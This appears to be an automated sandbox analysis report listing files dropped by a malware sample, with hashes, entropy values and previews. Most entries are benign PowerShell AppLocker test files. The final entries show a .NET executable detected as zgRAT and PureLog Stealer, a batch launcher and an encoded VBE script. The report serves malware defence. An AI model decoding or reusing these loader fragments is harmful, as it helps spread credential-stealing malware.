SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kbgr1ix.qoe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2iritkqc.ghp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nu1umcr.ssp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51sffkqg.35d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55v034hw.2dy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lbdh5ls.gdd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afys3oxa.y2y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_biomgtx5.2uv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzk4nb4w.xdo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ft3zelu2.5cs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkk4j5yv.ftu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4sa4omo.hyp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kr1muiys.zpe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuskymfd.huo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loqtm3yh.zyn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1n3rhxk.t0j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdskj3fs.evm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnquivaa.ite.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfj1lzoo.njp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpvjgrg.mk1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqfoj2ys.azh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjwdljqh.kcy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1mxiuea.vs3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmffrhfj.vbq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfuis3ym.eco.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bba2018c39ea80e6507645609af5208d547f6a81

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (304), with no line terminators
Category:	dropped
Size (bytes):	304
Entropy (8bit):	5.794275153240054
Encrypted:	false
SSDEEP:	6:dtBfYi/Llc5CfYplRJYEBvNjHakw03FTbAeAVVdctiNOkXLmltR:LurFpl7TBBHC0mnVbNbiltR
MD5:	17F4FAED744E62799742C49D3A9D9B51
SHA1:	6D39AA27AB6185E5D4FC7123891D287CEC8C9F1C
SHA-256:	6384C882D3C08C0A13F10BA2F479C6D80D8E7A286E2CB4DDE9EC40D0917F372B
SHA-512:	B47E21190D473E5B6D9D232F60E5990EA492E17A968D3FD7F0B6DBF443CEEBED77210A73C9B07509DDDD26A3EDE09503232A3FBD2637CE18E3A178AD4CC835AE
Malicious:	false
Reputation:	unknown
Preview:	H4sIAAAAAAAEAIWPQUsDQQyF/8rSk4Is1IVSvJWVWlGkWnsyHsJM3E6ZSYZJ6Lb/3kE89GDx9OAled/Lx6S/A9gqFQXYC1MVp66EbC0daXLzx/yFbCXiAbKM1d9RjGe76yJDwdQsQyRtro7z2TXAGNjLqE3CEAHenvb28OpOQS7dVSQHVsMYm0f+kpLQgnDtlvx/rEFkiFQTskerOm27tpu13fS2ksnJgcoJwKOuRC8/ucj5Hg0BnsVh7fxOKQMkXQzEtsEDaRIOJgWg32HgXtKGSs3+tX+CP78BbVjw+l8BAAA=

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.031377595969092
Encrypted:	false
SSDEEP:	3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
MD5:	77218AE27E9AD896918D9A081C61B1BE
SHA1:	3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
SHA-256:	E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
SHA-512:	6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
Malicious:	true
Reputation:	unknown
Preview:	%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.712224367043722
Encrypted:	false
SSDEEP:	6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
MD5:	D6DA6166258E23C9170EE2A4FF73C725
SHA1:	C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
SHA-256:	78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
SHA-512:	37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
Malicious:	true
Reputation:	unknown
Preview:	#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.

C:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1034386329121957
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryclRak7YnqqnlWPN5Dlq5J:+RI+ycuZhN2jakSnsPNnqX
MD5:	AE4BFC3FB4A8DDBAF2198475B919E352
SHA1:	12B9EA0561BDB57740E65618044999B7A22A4643
SHA-256:	47FFAC32D8AF730DDD8DBC22166C8BACA4E9E395D04CE95021E49E09FB5E815F
SHA-512:	0BEE2001B4CAFC48516B95D0022824621DC213174ADD02B4D8CCB7697CE2683DCEBB3EA83D1EB90E5BC971F7B531D45037E7BDB779BACFD59E7CBB864BEB6222
Malicious:	false
Reputation:	unknown
